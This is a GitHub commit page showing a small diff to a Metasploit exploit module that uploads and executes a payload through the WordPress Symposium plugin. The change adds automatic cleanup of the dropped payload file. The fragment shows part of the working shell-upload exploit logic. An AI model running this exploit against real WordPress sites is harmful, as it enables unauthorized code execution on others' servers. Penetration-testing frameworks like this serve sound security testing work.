We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 93dc90d commit 82e6183Copy full SHA for 82e6183
modules/exploits/unix/webapp/wp_symposium_shell_upload.rb
@@ -8,6 +8,7 @@
8
class Metasploit3 < Msf::Exploit::Remote
9
Rank = ExcellentRanking
10
11
+ include Msf::Exploit::FileDropper
12
include Msf::HTTP::Wordpress
13
14
def initialize(info = {})
@@ -76,6 +77,8 @@ def exploit
76
77
78
if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0'
79
print_good("#{peer} - Uploaded the payload")
80
+ register_files_for_cleanup(payload_name)
81
+
82
print_status("#{peer} - Executing the payload...")
83
send_request_cgi(
84
{
0 commit comments